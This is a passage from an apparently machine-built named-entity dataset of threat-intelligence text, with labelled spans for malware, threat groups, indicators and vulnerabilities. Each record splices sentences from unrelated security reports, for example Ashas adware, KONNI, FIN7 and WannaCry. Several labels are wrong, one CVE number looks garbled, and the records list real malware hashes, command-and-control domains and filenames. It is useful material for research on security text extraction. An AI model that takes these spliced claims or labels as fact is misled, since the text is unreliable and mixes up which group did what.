"label": "Indicator"}, {"start": 228, "end": 245, "label": "Indicator"}, {"start": 246, "end": 262, "label": "Indicator"}, {"start": 263, "end": 280, "label": "Indicator"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 419, "end": 430, "label": "Indicator"}, {"start": 431, "end": 441, "label": "Indicator"}, {"start": 442, "end": 453, "label": "Indicator"}, {"start": 454, "end": 464, "label": "Indicator"}, {"start": 465, "end": 478, "label": "Indicator"}, {"start": 507, "end": 518, "label": "Indicator"}, 
{"start": 519, "end": 530, "label": "Indicator"}, {"start": 531, "end": 537, "label": "Indicator"}]} {"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 38, "label": "Indicator"}, {"start": 39, "end": 54, "label": "Indicator"}, {"start": 55, "end": 67, "label": "Indicator"}, {"start": 68, "end": 78, "label": "Indicator"}, {"start": 79, "end": 94, "label": "Indicator"}, {"start": 95, "end": 113, "label": "Indicator"}, {"start": 114, "end": 130, "label": "Indicator"}, {"start": 131, "end": 146, "label": "Indicator"}, {"start": 167, "end": 231, "label": "Indicator"}, {"start": 232, "end": 296, "label": "Indicator"}, {"start": 297, "end": 308, "label": "Organization"}, {"start": 323, "end": 335, "label": "Organization"}, {"start": 394, "end": 407, "label": "Malware"}, {"start": 516, "end": 553, "label": "Indicator"}, {"start": 601, "end": 607, "label": "System"}, {"start": 628, "end": 633, "label": "System"}, {"start": 687, "end": 709, "label": "Organization"}, {"start": 722, "end": 736, "label": "Organization"}, {"start": 739, "end": 745, "label": "Organization"}, {"start": 748, "end": 757, "label": 
"Organization"}]} {"text": "54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . The .scr files drops two files: an executable and a library .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 439, "end": 443, "label": "Indicator"}]} {"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations . 
As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 226, "end": 233, "label": "System"}, {"start": 251, "end": 266, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 432, "end": 439, "label": "System"}, {"start": 469, "end": 483, "label": "Indicator"}]} {"text": "millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . Contrary to the previous version , the developers moved the core of malware to the library .", "spans": [{"start": 161, "end": 172, "label": "System"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 258, "end": 271, "label": "Organization"}]} {"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor . 
The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": [{"start": 25, "end": 36, "label": "System"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 262, "end": 268, "label": "System"}, {"start": 386, "end": 393, "label": "System"}, {"start": 475, "end": 485, "label": "System"}]} {"text": "Of those , 21 were still available at the time of discovery . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . Loading the dropped library .", "spans": [{"start": 62, "end": 66, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}, {"start": 114, "end": 124, "label": "Organization"}]} {"text": "We reported the apps to the Google security team and they were swiftly removed . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . The library contains the same features as the previous version as well as new ones .", "spans": [{"start": 92, "end": 97, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}]} {"text": "However , the apps are still available in third-party app stores . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . 
This version of KONNI is the most advanced with better coding .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 83, "end": 88, "label": "Organization"}, {"start": 156, "end": 170, "label": "Organization"}, {"start": 173, "end": 182, "label": "Organization"}, {"start": 187, "end": 198, "label": "Organization"}, {"start": 217, "end": 222, "label": "Malware"}]} {"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 45, "end": 68, "label": "Malware"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 170, "end": 184, "label": "Organization"}, {"start": 283, "end": 291, "label": "Organization"}, {"start": 362, "end": 387, "label": "Indicator"}]} {"text": "Figure 1 . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . A new URI is available: /uploadtm.php .", "spans": [{"start": 11, "end": 21, "label": "Organization"}, {"start": 98, "end": 106, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 160, "end": 184, "label": "Indicator"}]} {"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 . ESET recently uncovered a new addition to OceanLotus\u2019s toolset targeting Mac OS . 
This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": [{"start": 12, "end": 35, "label": "Malware"}, {"start": 65, "end": 69, "label": "Organization"}, {"start": 81, "end": 85, "label": "Organization"}, {"start": 123, "end": 135, "label": "Organization"}]} {"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was \u201c Video downloader master \u201d with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware . In mid-2018 , Kaspersky's report on Operation AppleJeus\u201d highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": [{"start": 31, "end": 61, "label": "Malware"}, {"start": 65, "end": 76, "label": "System"}, {"start": 142, "end": 147, "label": "Malware"}, {"start": 258, "end": 269, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 440, "end": 445, "label": "Malware"}]} {"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . 
Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": [{"start": 67, "end": 76, "label": "Organization"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 200, "end": 209, "label": "Indicator"}, {"start": 242, "end": 252, "label": "Indicator"}, {"start": 253, "end": 264, "label": "Indicator"}, {"start": 265, "end": 275, "label": "Indicator"}, {"start": 276, "end": 287, "label": "Indicator"}, {"start": 288, "end": 299, "label": "Indicator"}, {"start": 300, "end": 310, "label": "Indicator"}]} {"text": "[ Note : The analysis of the functionality below describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family . Kaspersky wrote about LuckyMouse targeting national data centers in June . The handling of instructions has improved too .", "spans": [{"start": 105, "end": 135, "label": "Malware"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 160, "end": 170, "label": "Organization"}]} {"text": "] Once launched , the app starts to communicate with its C & C server ( whose IP address is base64-encoded in the app ) . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": [{"start": 122, "end": 131, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}]} {"text": "It sends \u201c home \u201d key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed . 
Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . Upload a specific file based on a filename .", "spans": [{"start": 228, "end": 236, "label": "Organization"}, {"start": 244, "end": 253, "label": "System"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 343, "end": 349, "label": "Organization"}, {"start": 354, "end": 364, "label": "Organization"}]} {"text": "Figure 3 . In August 2019 , FireEye released the Double Dragon\u201d report on our newest graduated threat group , APT41 . Upload a specific file based on the full path name .", "spans": [{"start": 28, "end": 35, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}]} {"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Create a screenshot and uploads it on the C2 .", "spans": [{"start": 175, "end": 182, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 434, "end": 436, "label": "System"}]} {"text": "Figure 4 . Group-IB experts continuously monitor the Silence\u2019 activities . Get system information .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 53, "end": 61, "label": "Organization"}]} {"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . 
Download a file from the Internet .", "spans": [{"start": 121, "end": 129, "label": "Organization"}, {"start": 161, "end": 171, "label": "Organization"}, {"start": 184, "end": 189, "label": "Organization"}]} {"text": "First , the malicious app tries to determine whether it is being tested by the Google Play security mechanism . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Execute a command .", "spans": [{"start": 79, "end": 90, "label": "System"}, {"start": 112, "end": 120, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}]} {"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers . Finally , Kaspersky produced a summary report on Sofacy\u2019s summertime activity . When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": [{"start": 218, "end": 227, "label": "Organization"}, {"start": 257, "end": 265, "label": "Organization"}]} {"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . 
The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}, {"start": 253, "end": 258, "label": "Malware"}, {"start": 323, "end": 359, "label": "Indicator"}]} {"text": "Second , the app can set a custom delay between displaying ads . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": [{"start": 144, "end": 153, "label": "Organization"}, {"start": 163, "end": 173, "label": "Organization"}]} {"text": "The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks . Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": [{"start": 127, "end": 136, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 236, "end": 244, "label": "Vulnerability"}, {"start": 298, "end": 303, "label": "System"}]} {"text": "This delay means that a typical testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . 
The analysis shows us the evolution of KONNI over the last 3 years .", "spans": [{"start": 141, "end": 154, "label": "Malware"}, {"start": 181, "end": 217, "label": "Malware"}, {"start": 249, "end": 259, "label": "Malware"}, {"start": 272, "end": 284, "label": "Malware"}, {"start": 328, "end": 333, "label": "Malware"}]} {"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The last campaign was started a few days ago and is still active .", "spans": [{"start": 128, "end": 139, "label": "Malware"}]} {"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . The infrastructure remains up and running at the time of this post .", "spans": [{"start": 123, "end": 138, "label": "Malware"}, {"start": 221, "end": 240, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}]} {"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . The RAT has remained under the Radar for multiple years .", "spans": [{"start": 158, "end": 171, "label": "Malware"}, {"start": 236, "end": 249, "label": "Organization"}, {"start": 283, "end": 288, "label": "System"}]} {"text": "The app then continues to run in the background without the user \u2019 s knowledge . The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . 
An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": [{"start": 198, "end": 206, "label": "Malware"}]} {"text": "This stealth technique has been gaining popularity among adware-related threats distributed via Google Play . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": [{"start": 96, "end": 107, "label": "System"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}]} {"text": "Figure 5 . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": [{"start": 31, "end": 45, "label": "Malware"}, {"start": 65, "end": 71, "label": "Organization"}, {"start": 145, "end": 168, "label": "Organization"}]} {"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker \u2019 s choice ; each ad is displayed as a full screen activity . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . 
Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": [{"start": 384, "end": 393, "label": "Organization"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 454, "end": 460, "label": "System"}]} {"text": "If the user wants to check which app is responsible for the ad being displayed , by hitting the \u201c Recent apps \u201d button , another trick is used : the app displays a Facebook or Google icon , as seen in Figure 6 . The malware may inject itself into browser processes and explorer.exe . We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": [{"start": 164, "end": 172, "label": "Organization"}, {"start": 176, "end": 182, "label": "Organization"}, {"start": 216, "end": 223, "label": "System"}, {"start": 269, "end": 281, "label": "Malware"}]} {"text": "The adware mimics these two apps to look legitimate and avoid suspicion \u2013 and thus stay on the affected device for as long as possible . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . Clearly the author has a real interest in North Korea , with 3 of the 4 campaigns are linked to North Korea .", "spans": [{"start": 161, "end": 169, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}]} {"text": "Figure 6 . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . Additional ways our customers can detect and block this threat are listed below .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 133, "end": 152, "label": "Malware"}]} {"text": "The adware activity impersonates Facebook ( left ) . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . 
Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors .", "spans": [{"start": 33, "end": 41, "label": "Organization"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 153, "end": 168, "label": "Malware"}, {"start": 180, "end": 207, "label": "System"}, {"start": 210, "end": 213, "label": "System"}]} {"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": [{"start": 153, "end": 168, "label": "Malware"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 252, "label": "System"}, {"start": 256, "end": 259, "label": "System"}]} {"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Email Security can block malicious emails sent by threat actors as part of their campaign .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 142, "end": 158, "label": "Malware"}, {"start": 242, "end": 256, "label": "System"}, {"start": 277, "end": 283, "label": "System"}]} {"text": "This trick \u2013 posing as a part of a legitimate Google service \u2013 may help avoid scrutiny . APT32 actors continue to deliver the malicious attachments via spear-phishing emails . 
The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": [{"start": 46, "end": 52, "label": "Organization"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 126, "end": 147, "label": "Malware"}, {"start": 180, "end": 196, "label": "Organization"}, {"start": 211, "end": 214, "label": "System"}, {"start": 219, "end": 223, "label": "System"}]} {"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 176, "end": 197, "label": "Malware"}, {"start": 234, "end": 249, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]} {"text": "Figure 7 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": [{"start": 91, "end": 99, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}]} {"text": "Malicious code hidden in a package named \u201c com.google \u201d Hunting down the developer Using open-source information , we tracked down the developer of the adware , who we also identified as the campaign \u2019 s operator and owner of the C & C server . February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware . 
SHA256 : 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f .", "spans": [{"start": 426, "end": 434, "label": "Organization"}, {"start": 456, "end": 463, "label": "Organization"}, {"start": 491, "end": 508, "label": "Malware"}, {"start": 520, "end": 584, "label": "Indicator"}]} {"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Filename: beauty.scr .", "spans": [{"start": 169, "end": 188, "label": "Malware"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 239, "end": 256, "label": "System"}, {"start": 269, "end": 279, "label": "Indicator"}]} {"text": "First , based on information that is associated with the registered C & C domain , we identified the name of the registrant , along with further data like country and email address , as seen in Figure 8 . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": [{"start": 217, "end": 234, "label": "Malware"}, {"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 423, "end": 487, "label": "Indicator"}]} {"text": "Figure 8 . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . Filename: C:\\Windows\\beauty.jpg .", "spans": [{"start": 45, "end": 53, "label": "Malware"}, {"start": 60, "end": 97, "label": "Vulnerability"}, {"start": 110, "end": 131, "label": "Indicator"}]} {"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search . 
To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . File type: JPEG image data , JFIF standard 1.02 .", "spans": [{"start": 47, "end": 52, "label": "Malware"}, {"start": 228, "end": 232, "label": "Organization"}, {"start": 262, "end": 279, "label": "System"}, {"start": 296, "end": 307, "label": "Malware"}]} {"text": "The email address and country information drove us to a list of students attending a class at a Vietnamese university \u2013 corroborating the existence of the person under whose name the domain was registered . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . SHA256 : 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 .", "spans": [{"start": 235, "end": 243, "label": "Organization"}, {"start": 258, "end": 262, "label": "Organization"}, {"start": 339, "end": 351, "label": "Malware"}, {"start": 363, "end": 371, "label": "System"}, {"start": 391, "end": 455, "label": "Indicator"}]} {"text": "Figure 9 . We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . 
Hilename: C:\\Windows\\svchost.exe .", "spans": [{"start": 38, "end": 44, "label": "Organization"}, {"start": 124, "end": 140, "label": "Malware"}, {"start": 281, "end": 303, "label": "Indicator"}]} {"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit \u2019 s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he attended . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": [{"start": 235, "end": 240, "label": "System"}, {"start": 375, "end": 389, "label": "Malware"}, {"start": 493, "end": 503, "label": "Organization"}]} {"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . phpschboy.prohosts.org .", "spans": [{"start": 126, "end": 138, "label": "Malware"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 232, "end": 254, "label": "Indicator"}]} {"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . 
jams481.site.bz .", "spans": [{"start": 98, "end": 105, "label": "Malware"}, {"start": 262, "end": 281, "label": "System"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 326, "end": 341, "label": "Indicator"}]} {"text": "However , his study results are out of the scope of our research . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": [{"start": 71, "end": 78, "label": "Malware"}, {"start": 117, "end": 132, "label": "Malware"}, {"start": 247, "end": 311, "label": "Indicator"}]} {"text": "Based on our culprit \u2019 s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality . Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 114, "end": 118, "label": "Malware"}, {"start": 205, "end": 262, "label": "Indicator"}]} {"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . 
SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 114, "end": 119, "label": "Malware"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 219, "end": 230, "label": "Malware"}, {"start": 323, "end": 387, "label": "Indicator"}]} {"text": "However , a simple Google search for the adware package name returned a \u201c TestDelete \u201d project that had been available in his repository at some point The malicious developer also has apps in Apple \u2019 s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . Filename: conhote.dll .", "spans": [{"start": 19, "end": 25, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 202, "end": 211, "label": "System"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 270, "end": 293, "label": "Malware"}, {"start": 306, "end": 317, "label": "Indicator"}]} {"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": [{"start": 17, "end": 20, "label": "System"}, {"start": 55, "end": 66, "label": "System"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 166, "end": 179, "label": "Malware"}, {"start": 204, "end": 268, "label": "Indicator"}]} {"text": "Figure 10 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
Filename: winnit.exe .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 69, "end": 82, "label": "Malware"}, {"start": 108, "end": 118, "label": "Indicator"}]} {"text": "The malicious developer \u2019 s apps published on the App Store which don \u2019 t contain the Ashas adware Searching further for the malicious developer \u2019 s activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": [{"start": 86, "end": 91, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 217, "end": 222, "label": "Malware"}, {"start": 273, "end": 282, "label": "Malware"}, {"start": 312, "end": 325, "label": "Malware"}, {"start": 350, "end": 414, "label": "Indicator"}]} {"text": "As for the Ashas family , one of the associated promotional videos , \u201c Head Soccer World Champion 2018 \u2013 Android , ios \u201d was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 105, "end": 112, "label": "System"}, {"start": 115, "end": 118, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 265, "end": 271, "label": "Malware"}, {"start": 400, "end": 422, "label": "Indicator"}, {"start": 425, "end": 446, "label": "Indicator"}]} {"text": "Figure 11 . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
